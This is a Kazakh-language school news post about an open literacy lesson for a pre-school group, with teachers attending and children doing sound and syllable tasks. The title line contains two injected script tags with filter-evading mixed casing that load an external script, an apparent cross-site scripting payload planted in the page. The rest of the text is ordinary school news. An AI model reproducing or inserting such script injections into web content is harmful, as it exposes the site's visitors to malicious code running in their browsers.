Мектепалды «Қарлығаш» тобында Сауат ашу оқу қызметі бойынша «Білімдер еліне саяхат» атты ашық оқу іс-әрекеті өтті.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

27.02.2025

Бұл ерекше сабаққа бастауыш сынып мұғалімдері қатысып, балалардың білімге деген қызығушылығын, мектеп табалдырығын аттауға қаншалықты дайын екендігін көрсетті.
Саяхат барысында балалар түрлі тапсырмаларды орындап, дыбыстар әлеміне терең бойлады. Білімдер елінде балалар суретке қарап әңгіме құрап, дыбыстық талдаулар жасады, сөздерді буынға бөліп ребустарды шешті. Мұғалімдер бүлдіршіндердің белсенділігі мен тапқырлығына тәнті болып, олардың оқу үрдісіне деген ынтасын жоғары бағалады.
«Білімдер еліне саяхат» балалар үшін қызықты әрі танымдық  болып, олардың білімге деген құлшынысын арттыра түсті.

Просмотров: 222

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу
Текст